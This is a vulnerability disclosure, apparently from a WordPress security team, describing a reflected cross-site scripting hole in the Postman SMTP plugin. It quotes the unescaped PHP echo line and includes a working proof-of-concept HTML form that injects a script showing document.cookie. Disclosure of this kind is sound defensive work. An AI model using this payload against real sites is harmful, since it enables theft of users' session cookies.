We recently found the the plugin Postman SMTP contains a reflected cross-site scripting (XSS) vulnerability.
On line 346 of the file /Postman/Postman-Email-Log/PostmanEmailLogController.php the value of GET or POST input “page” is output without being escaped:
value="<?php echo $_REQUEST['page'] ?>" />
While the GET input “page” needs to be set to “postman_email_log” for that code to run, the POST input can be set to another value and depending on the configuration of PHP will be the one chosen to be output.
The website of the developer is down and we couldn’t find any other method to contact them directly. The plugin was last updated 16 months ago and is only listed as being compatible up to WordPress 4.4, so it doesn’t look like it is being maintained at this time.
Proof of Concept
The following proof of concept will cause any available cookies to be shown in alert box. Major web browsers other than Firefox provide XSS filtering, so this proof of concept will not work in those web browsers.
Make sure to replace “[path to WordPress]” with the location of WordPress.
<html> <body> <form action="http://[path to WordPress]/wp-admin/tools.php?page=postman_email_log" method="POST"> <input type="hidden" name="page" value='"><script>alert(document.cookie);</script>' /> <input type="submit" value="Submit" /> </form> </body> </html>